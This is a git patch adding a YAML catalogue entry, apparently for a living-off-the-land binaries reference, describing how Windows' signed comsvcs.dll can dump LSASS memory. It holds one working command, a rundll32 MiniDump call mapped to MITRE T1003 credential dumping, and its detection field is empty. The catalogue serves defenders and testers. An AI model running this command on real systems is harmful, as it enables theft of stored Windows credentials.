From dd5df7cf3ef5e449eee5318637a63eb6bbf92c42 Mon Sep 17 00:00:00 2001
From: plowsec <plowsec@users.noreply.github.com>
Date: Fri, 30 Aug 2019 14:12:46 +0200
Subject: [PATCH] Add Comsvcs.yml: dump lsass via signed DLL.

---
 yml/OSLibraries/comsvcs.yml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 yml/OSLibraries/comsvcs.yml

diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml
new file mode 100644
index 0000000..fce212e
--- /dev/null
+++ b/yml/OSLibraries/comsvcs.yml
@@ -0,0 +1,26 @@
+---
+Name: Comsvcs.dll
+Description: COM+ Services
+Author:
+Created: '2019-08-30'
+Commands:
+  - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
+    Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. 
+    UseCase: Dump Lsass.exe process memory to retrieve credentials.
+    Category: Dump
+    Privileges: SYSTEM
+    MitreID: T1003
+    MItreLink: https://attack.mitre.org/wiki/Technique/T1003
+    OperatingSystem: Windows
+Full_Path:
+  - Path: c:\windows\system32\comsvcs.dll
+Code_Sample:
+  - Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
+Detection:
+  - IOC:
+Resources:
+  - Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
+Acknowledegment:
+  - Person: modexp (modexp.wordpress.com)
+    Handle: 
+---
\ No newline at end of file